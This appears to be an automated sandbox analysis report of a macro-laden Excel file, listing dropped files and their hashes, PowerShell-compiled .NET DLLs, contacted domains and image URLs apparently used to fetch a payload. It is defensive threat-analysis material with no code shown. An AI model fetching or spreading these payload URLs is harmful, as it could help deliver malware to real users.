SHA-256:	7F00C185A0B6A3E90987006AEFF04E3CBD835A306CB4E5042858263DCE057E92
SHA-512:	DE7E8F916F8D45115762A60023EE6F577F97057D369A13EABD64B20C82F17E62D957E04A2F17D9A39569867632FB2BB6E0771D8A421D76141C6FD7E59BD8BD7D
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type:	data
Size (bytes):	2060
Entropy (8bit):	2.4108360043743438
Encrypted:	false
MD5:	038C205EFE3CA76F1C59ABFDA48BE646
SHA1:	6243DAC526824CAE0F403D27194C29F191C3267C
SHA-256:	8BA1BA61B8126D762B02DF9CED56FCBE51203A49D7857E1FAE716507B9626A5E
SHA-512:	00EC32AD63C0381374E5C4E87F9D53EECE64FCAEB9B9C0BFD9C293FB4360FA5F9F1989471929C8A82B7585BCDE4768AD56D6AEB28F117CE1702E4E2A1AFA1630
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
File Type:	data
Size (bytes):	2060
Entropy (8bit):	2.4079057351674455
Encrypted:	false
MD5:	73C02865CCCBE0059B6319FCF4AC761A
SHA1:	EFF28C7AFC586C3536DCEDA83CE1EA2ABAC71CF3
SHA-256:	72EB36338C8385C9533A278F4B8A4AD58702BDBC4669BA4BB8B605BABE9F63B7
SHA-512:	1462C7C52D883A2DE2E8884DBD58A81C910619927CC0C570E07FD166FCB41049B3184029D214FEDD270314DD1EDD453EFBFF385F0D73AE432DBBD40C52E22D01
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\TarD513.tmp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	137298
Entropy (8bit):	6.4071237290249625
Encrypted:	false
MD5:	5A090F2BC0B31AB45167C1C4A96758DD
SHA1:	358DC4AF3449FB377626B318A785EAFF1CEC6ACC
SHA-256:	636B968161E38DF912038EC7D968A728B67B868EE65F3494D6C047CEA109103B
SHA-512:	91AD9F545F557FD1B1F6C9794A15D457782BD9F9C53660879AF15709C60D3B2C93A11D098A99DDF993628B57AA65B562A6BBB5661C9FB3DA910CEB3A958CBC22
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user~1\AppData\Local\Temp\imgs.ht_ Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	9872
Entropy (8bit):	5.457246198922761
Encrypted:	false
MD5:	D192FC64425305AC667F610D7A57A637
SHA1:	A5C0E3F29A9340E7D3323DA5E3A4B65E48A9D4BA
SHA-256:	A23EA9AD676C467C51B2B8666B5986AD624C35A74BA34FDCAAC0A221384F5D53
SHA-512:	9C3DDA7FC5785B5AC9CDFC7BB123404B2E0C8E5007EE4F5E7B45DD66C3439BC5C355246559E8459B045D1ED1572F8ECB2C869830771CD73D062328273DBD275C
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\imgs.htm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Size (bytes):	9872
Entropy (8bit):	5.457246198922761
Encrypted:	false
MD5:	D192FC64425305AC667F610D7A57A637
SHA1:	A5C0E3F29A9340E7D3323DA5E3A4B65E48A9D4BA
SHA-256:	A23EA9AD676C467C51B2B8666B5986AD624C35A74BA34FDCAAC0A221384F5D53
SHA-512:	9C3DDA7FC5785B5AC9CDFC7BB123404B2E0C8E5007EE4F5E7B45DD66C3439BC5C355246559E8459B045D1ED1572F8ECB2C869830771CD73D062328273DBD275C
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\imgs.rcv Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Size (bytes):	604
Entropy (8bit):	2.9372545440775246
Encrypted:	false
MD5:	B8E152B8B4A0FAD483AAD198D846E774
SHA1:	D24F594034BAC4BAFA97B6EF47A2BDC28BCE4F02
SHA-256:	3AD112E8A2BE0D0090F9F5BA4B5AAB91343B17BAC47A6E65C9E203C64050CBD2
SHA-512:	9317F0D6906A4F6BEFF247ADF769FF3AC543364283DEA57AE7E33AE4563E9C19598EA5F6F7D8CBB182DDA110124D9CA5CA20117EADBECC404C17F226316D4459
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 56560 bytes, 1 file
Size (bytes):	56560
Entropy (8bit):	7.995785157236685
Encrypted:	true
MD5:	BB377DF27A55C05BB3793CD1E125C869
SHA1:	295D5A7CB802A8058059F6C29DC2491A15A7D55C
SHA-256:	3C4EC495F17D21CC236BC7238BC02728BD945C07157FBF875CAC340269AFC207
SHA-512:	AA074C05ACDA3414436A3EE01890C08024D6AF96868D856DF0382C9BA531D6701A6EF45A6A0C80FF21670BCF94AE7F1ED5FDEB0E4FA7A5BABF6F8D9FB19F06DC
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	328
Entropy (8bit):	3.145461979922497
Encrypted:	false
MD5:	5881A41A45E7F7EEDB1950115E22DAFD
SHA1:	552E18CFD5CE4E3468FCE0639B83A596ED0AB934
SHA-256:	9D7D7CC1E5F4C96C28D7BA61FD41E1F8F84A75ED03BEB169BAB80FCB2558E182
SHA-512:	C5C4E8AC9CFE7770D549757A2A522346C09F45EBE3DB237ADD6E6E900A53E8F304DC0F5EACD08BF696815232095D5BC052AB3C5276531DA0642F321076A48434
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	212
Entropy (8bit):	2.7984883280739608
Encrypted:	false
MD5:	B7608E47F786699F9008740BBB04AC15
SHA1:	D87BFF80BB8D93799F34E9603766FC1B81CB868E
SHA-256:	22D1819D875B6139D23C606B97341194841FE29D5F77D47629254DEA134F3B01
SHA-512:	0D3B34D6BB3413371C660E9F2417B8F56B4049EE60F2C0BDA51E0FEB7748E4B24C9E4F6022E35FFC1E372AE492CC31BC09C5DE443E68B52B6FE24B9E78AC30CD
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4557AFE5.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Size (bytes):	2384
Entropy (8bit):	2.8957044414065836
Encrypted:	false
MD5:	3668F8F6DA73FC477A1FB3A6F8D8F603
SHA1:	48834AEB3B35E7B247682EA5468E58FB5BFD767B
SHA-256:	B598E1C8A2D23122E08B9F0260D1C9BBB56FFB98469B3E61783D2044D0B40FD3
SHA-512:	E6E5CA072639CEAA8CF731444B02E0A613B22400946EAD5217B6CAE5D870B1B879F9615CAE03619A461D96AE71E34FAF458C4439D86DD326FE323BDF4072004A
Malicious:	false

C:\Users\user\AppData\Local\Temp\3ndkwphw.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with no line terminators
Size (bytes):	122
Entropy (8bit):	4.7258213810582825
Encrypted:	false
MD5:	11944D237AD560F93D9CEBAFD08B34B8
SHA1:	C9A82D5DA50AE7C92B2D8E9633F4A6C7F1ED5337
SHA-256:	9F9601B3681F22BD8446FA5F20F95724E4FA3BBD8004D24E9E8B2DA79330E4EB
SHA-512:	C55613FB31ACCDBD55035DF19FA466AE7EE0D419E112B602D5F60107D445DB3F338CED2715B6141EF961CCF4D35DD15286194C35E06B5CD2DA86DD0544E1AA75
Malicious:	false

C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Size (bytes):	319
Entropy (8bit):	5.272598734749209
Encrypted:	false
MD5:	D7066D387A8A3913F1A38DD1B8659DF5
SHA1:	FD7C54BCC52F7186AF16EE88ECEC7C014ADD5768
SHA-256:	0C86E90737B9224731E1A795C6D513336CEF2E7C02FC9B2D22E425CA7DF295FC
SHA-512:	53F134A70C5E168F379B15194C299966BAE52779716AE39864FF276F061CC4E0948E28C2CC3DB9BCFD5795654D48C631C933CC67F623BF0D5F65602553C7C6DF
Malicious:	false

C:\Users\user\AppData\Local\Temp\3ndkwphw.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):	3584
Entropy (8bit):	2.7306039412422276
Encrypted:	false
MD5:	AE68E60C0371D41D37C931E08BFDFAC3
SHA1:	984DF7DDC0ADDAECF50E97BCDE92A93E0FB2955C
SHA-256:	2DFB6507207523AA1B84EC865E8910CBF942D49418B07D6F4195BD6D38BE1ACD
SHA-512:	045F7E6E47EA9A034764936CC130265800B4DBDF0C6A0152F1DAEE1729637D63E802DF23CEC5309F96C9B4EEB519FCA4C3E356A8137B646EAA13DA59D94D927C
Malicious:	false
Yara Hits:	Rule: Embedded_PE, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\3ndkwphw.dll, Author: unknown

C:\Users\user\AppData\Local\Temp\3ndkwphw.out Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	198
Entropy (8bit):	4.894444435447011
Encrypted:	false
MD5:	182738883BFDFB548627BEC18305C7EE
SHA1:	FD5A8D41B96844985C0DC21116CFA689CED8AABE
SHA-256:	5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622
SHA-512:	9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D73628FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0
Malicious:	false

C:\Users\user\AppData\Local\Temp\3ndkwphw.pdb Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	data
Size (bytes):	19021
Entropy (8bit):	1.052806490157703
Encrypted:	false
MD5:	D32096E59ED6033FE2577CC5E96FEC19
SHA1:	38F59C2ABE9DC0767BCA520A5B3A38F08ADEE6BE
SHA-256:	182623A94258C5DAFDD05D11ED428C8641993C2A03B91EB284B299B1F1B5331A
SHA-512:	399B7CFE2A407B90BF223A1109CDB93A057882F06761193B902C167003832A3D8254357238F0B52B9706ED9C92F2E51722F133BCECAB0CC8C5E76415972195AE
Malicious:	false

C:\Users\user\AppData\Local\Temp\CSC3552.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	MSVC .res
Size (bytes):	652
Entropy (8bit):	3.097999233859508
Encrypted:	false
MD5:	C06A4854CEF3DC8FA8C83B98529D2E25
SHA1:	F205EA952D6061094950110E6F32C65B3EF05575
SHA-256:	0DDC5DEE89BD713C9356BD14A251CC9C58EB5E4144254FB5AC7007BBD93BB234
SHA-512:	7BB179B083FF9D5FEA19E5DD364A9ABCECB7B07F5D1974489AE14A478355D1966A2191C14F664DED553418399B4F6A280EFFF937A355C07FC3657F645B90992A
Malicious:	false

C:\Users\user\AppData\Local\Temp\CSC3553.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	MSVC .res
Size (bytes):	652
Entropy (8bit):	3.114364084100377
Encrypted:	false
MD5:	0F6289C0FC9E6D5B9089D08358F66DC9
SHA1:	F051A770E5C323CD4C5286079023862FE01CA746
SHA-256:	753C44A88448F4C9A5D5653A485E35C798B005BF76B460E1011AD212C2DBEE6A
SHA-512:	852F94E945164A3E6986695080BF780DDF434B40EE9F355A6EA8743B7B35630B9BDD11C038481CE5D2C63C9C2817CAEE548159AB2BB0BEA591B1EC036554F480
Malicious:	false

C:\Users\user\AppData\Local\Temp\CSCAD75.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	MSVC .res
Size (bytes):	652
Entropy (8bit):	3.1066498125672046
Encrypted:	false
MD5:	E23AB9A581FAEFF875614938D9400CC4
SHA1:	D2A6CCB8993B92D20B646BBC17C85A546F0131E6
SHA-256:	9499C892686F2D14387E1B5C65A634C2032238E76C3AE3EBADDC38F318CD9C0C
SHA-512:	5A39FA86872978B6B3A8A5D2AA9D5BC98DF9A474D4C32F2079C897B38CF14C63B293561FEFC7D833AD08EDB28636BB80BDEC88E7479B24755A4BA48E483A9AC9
Malicious:	false

C:\Users\user\AppData\Local\Temp\h2oah0u7.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with no line terminators
Size (bytes):	122
Entropy (8bit):	4.7258213810582825
Encrypted:	false
MD5:	11944D237AD560F93D9CEBAFD08B34B8
SHA1:	C9A82D5DA50AE7C92B2D8E9633F4A6C7F1ED5337
SHA-256:	9F9601B3681F22BD8446FA5F20F95724E4FA3BBD8004D24E9E8B2DA79330E4EB
SHA-512:	C55613FB31ACCDBD55035DF19FA466AE7EE0D419E112B602D5F60107D445DB3F338CED2715B6141EF961CCF4D35DD15286194C35E06B5CD2DA86DD0544E1AA75
Malicious:	false

C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Size (bytes):	319
Entropy (8bit):	5.287923040029769
Encrypted:	false
MD5:	301E977E1BA00AEF61375665BF653373
SHA1:	F3C61A7B51AE783889B545880497AC8CC1003F8F
SHA-256:	4813D425558EF9206903CF833F629742899EB4C20997E141DB7F5A223F5C6DAF
SHA-512:	29FAF20892DBD74C9D628146EEAE97BCA2C157A30E5B84BCF73B0C705CA88C689FA7301E4886D11DA01A8E84A380A5553FE285AA73AFFBA56EA815197A107C5A
Malicious:	false

C:\Users\user\AppData\Local\Temp\h2oah0u7.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):	3584
Entropy (8bit):	2.7207380576561793
Encrypted:	false
MD5:	8BFE063A25BD8CA8628AA92D065CF9AF
SHA1:	B3D078EB037EA8C9F106DA913AD321B4137AE063
SHA-256:	5B6A7F039902F46D912868BA4C81FE28202724029DD9167E32B327C084A3E279
SHA-512:	6E367248288E8FC7363E846830F3BE41B6F19B7A17DE11BB5721C1770F36A9E364015B7D5455E7CBC850841E283C413CA227A4D66A162389CE6E22B6AA1ED097
Malicious:	false
Yara Hits:	Rule: Embedded_PE, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\h2oah0u7.dll, Author: unknown

C:\Users\user\AppData\Local\Temp\h2oah0u7.out Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	198
Entropy (8bit):	4.894444435447011
Encrypted:	false
MD5:	182738883BFDFB548627BEC18305C7EE
SHA1:	FD5A8D41B96844985C0DC21116CFA689CED8AABE
SHA-256:	5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622
SHA-512:	9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D73628FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0
Malicious:	false

C:\Users\user\AppData\Local\Temp\h2oah0u7.pdb Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	data
Size (bytes):	19021
Entropy (8bit):	1.051322052405076
Encrypted:	false
MD5:	7D778A4AF2EF48EAF4B385171F50D3E0
SHA1:	1B7A4C76F05CE4A822AECC0BB7124F7BBE9CA263
SHA-256:	A537F138C7F9CE57A2B29505953ACF0876475DD9ABB414FA5C708FC75EF27A89
SHA-512:	2CE01D54592AE7F5C5FD1FD85E863E9C17DE54BD03A217273C6D73B66AFAFA417643E38D2E933C45C21FF8CDDDC586495ED823838C57A0ACC56213EB404315D6
Malicious:	false

C:\Users\user\AppData\Local\Temp\ua6j8io5.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with no line terminators
Size (bytes):	122
Entropy (8bit):	4.7258213810582825
Encrypted:	false
MD5:	11944D237AD560F93D9CEBAFD08B34B8
SHA1:	C9A82D5DA50AE7C92B2D8E9633F4A6C7F1ED5337
SHA-256:	9F9601B3681F22BD8446FA5F20F95724E4FA3BBD8004D24E9E8B2DA79330E4EB
SHA-512:	C55613FB31ACCDBD55035DF19FA466AE7EE0D419E112B602D5F60107D445DB3F338CED2715B6141EF961CCF4D35DD15286194C35E06B5CD2DA86DD0544E1AA75
Malicious:	false

C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Size (bytes):	319
Entropy (8bit):	5.259771159179154
Encrypted:	false
MD5:	B40CBE8A22E66DF7E25031EAA8344595
SHA1:	1593868B83B8BB2492D2CB33E7F422A2D5E51587
SHA-256:	F942548475752734D431D0C863E1983BB9AD47EBDD4239B0715950D19FFA73E6
SHA-512:	7FD801C25E44484FD2D61DCA660C65307495CACA07EF9821D9134C41E88EAF32E9F361ECC265DB65D75B22456FA6637EF89F1FDC3F85372C9B18BF686E03A436
Malicious:	false

C:\Users\user\AppData\Local\Temp\ua6j8io5.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):	3584
Entropy (8bit):	2.7285087840229334
Encrypted:	false
MD5:	8E2B3C5AB1D089E557F644E49FCAE280
SHA1:	7C6D2B98A16D146E541669A87920249E5F918A70
SHA-256:	ED9561C1A57EE9DE8F3FA00D83D2A3A283F5C6C2F280B98B819CF0AC1E721FE0
SHA-512:	99D8D088524968640546000B03A2D1F7BA99FCAE462515F9DCDA00BDB5262E8C218D00C165B7E5A7FCF2E9D19C28B5C7ECCC3432A0B1EC38E2E3625570B5056A
Malicious:	false
Yara Hits:	Rule: Embedded_PE, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\ua6j8io5.dll, Author: unknown

C:\Users\user\AppData\Local\Temp\ua6j8io5.out Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	198
Entropy (8bit):	4.894444435447011
Encrypted:	false
MD5:	182738883BFDFB548627BEC18305C7EE
SHA1:	FD5A8D41B96844985C0DC21116CFA689CED8AABE
SHA-256:	5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622
SHA-512:	9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D73628FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0
Malicious:	false

C:\Users\user\AppData\Local\Temp\ua6j8io5.pdb Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
File Type:	data
Size (bytes):	19021
Entropy (8bit):	1.05423565676684
Encrypted:	false
MD5:	C1605ED563DEC6B8F8619CEF82773B7E
SHA1:	BBD75CD8884041957E42E92BA5095313E497B784
SHA-256:	9EE23677AE52BF775BFFE0D5326EB7B02519B653E7E0158C3545CCE16EF62C00
SHA-512:	5B8F4C12A8ECC91C0649A31E06C503BB7E0861363783C8A1CE9E9C0222FE44B5D852448E564FDCB8ED77C8E8189F8DBE199B8C05EF26932317CE46379647101B
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GKB4WSM21VSQXYPLXM37.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.5529360988419914
Encrypted:	false
MD5:	69E450EC9EC266976E7AF3A07250049E
SHA1:	8AB97CDA41842FE713AB6167F4B1279F3AD010BC
SHA-256:	7C75CA24E19B4154CC96ECB8BD89D35011F5B1449000B6535097BC28A644E630
SHA-512:	6CA7ACBC5403E16FB3EF7B278B5DC81B859C2B32C783F23F8507ABB1D9DED18DEAA8F8B5A1636A3FC61098A2A26D35879F707BD6373359800717D8284C3575CC
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NI4IEHF58SOSDIK6KPU3.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.5529360988419914
Encrypted:	false
MD5:	69E450EC9EC266976E7AF3A07250049E
SHA1:	8AB97CDA41842FE713AB6167F4B1279F3AD010BC
SHA-256:	7C75CA24E19B4154CC96ECB8BD89D35011F5B1449000B6535097BC28A644E630
SHA-512:	6CA7ACBC5403E16FB3EF7B278B5DC81B859C2B32C783F23F8507ABB1D9DED18DEAA8F8B5A1636A3FC61098A2A26D35879F707BD6373359800717D8284C3575CC
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NK2TX2NW2FLMR9TRWK65.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.5529360988419914
Encrypted:	false
MD5:	69E450EC9EC266976E7AF3A07250049E
SHA1:	8AB97CDA41842FE713AB6167F4B1279F3AD010BC
SHA-256:	7C75CA24E19B4154CC96ECB8BD89D35011F5B1449000B6535097BC28A644E630
SHA-512:	6CA7ACBC5403E16FB3EF7B278B5DC81B859C2B32C783F23F8507ABB1D9DED18DEAA8F8B5A1636A3FC61098A2A26D35879F707BD6373359800717D8284C3575CC
Malicious:	false

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
prod.imgur.map.fastlylb.net	151.101.36.193	true	false	high
ipinfo.io	216.239.34.21	true	false	high
i.imgur.com	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.ioH	powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1783154339.05919000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://oi65.tinypic.com/2z8thcz.jpg	powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
http://crl.entrust.net/server1.crl0	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
http://cps.letsencrypt.org0	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
http://ocsp.entrust.net03	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
http://cert.int-x3.letsencrypt.org/0	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
http://ocsp.int-x3.letsencrypt.org0/	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
https://i.imgur.com/96vV0YR.png	powershell.exe, 00000009.00000002.1774266374.002CB000.00000004.sdmp	false		high
https://i.imgur.com	powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
http://ocsp.digicert.c	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
https://ipinfo.io/country8	powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1782716792.05790000.00000004.sdmp	false		high
https://ipinfo.io/countryx	powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1783154339.05919000.00000004.sdmp	false		high
http://www.microsoft.	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp	false		high
https://ipinfo.ioh%	powershell.exe, 00000004.00000002.1679759349.056B0000.00000004.sdmp, powershell.exe, 00000009.00000002.1782716792.05790000.00000004.sdmp	false	Avira URL Cloud: safe	low
https://i.imgur.com/96vV0YR.pngH	powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmp	false		high
http://ocsp.entrust.net0D	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
https://secure.comodo.com/CPS0	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high
http://cps.root-x1.letsencrypt.org0	powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
151.101.36.193	United States	54113	unknown	false
216.239.34.21	United States	15169	unknown	false
216.239.32.21	United States	15169	unknown	true

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 932, Create Time/Date: Mon Feb 25 10:23:13 2019, Last Saved Time/Date: Mon Feb 25 13:06:42 2019, Security: 0
Entropy (8bit):	6.858261913981842
TrID:	Microsoft Excel sheet (30009/1) 46.87% Microsoft Excel sheet (alternate) (24509/1) 38.28% Generic OLE2 / Multistream Compound File (8008/1) 12.51% Java Script embedded in Visual Basic Script (1500/0) 2.34%
File name:	XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls
File size:	103424
MD5:	aacb83294ca96f6713da83363ffd9804
SHA1:	caf5fa832bfb46efe77515a9419c7fb450231123
SHA256:	23d7f618d925f08f66b02886d74522f0351d0fa2bd0ef349e9d205f21e04d0e5
SHA512:	e9dd945e26383cb0b8bb7cf61dad6ffabc14b690ffc1f6f594785c3b344417233bdbcdbd468c634fdb9b2a9dbf0c51d0c0ffe6b3194b3d46454f49b1b18a02f8
SSDEEP:	3072:6wk3hOdsylKlgryzc4bNhZFGzE+cL4LgldAhiE90WlSCSoHqfWVe0NTMqRmj6a1d:6wk3hOdsylKlgryzc4bNhZF+E+W4Lglv
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls"

Indicators
Has Summary Info:	True
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	932
Create Time:	2019-02-25 10:23:13
Last Saved Time:	2019-02-25 13:06:42
Security:	0

Document Summary
Document Code Page:	932
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

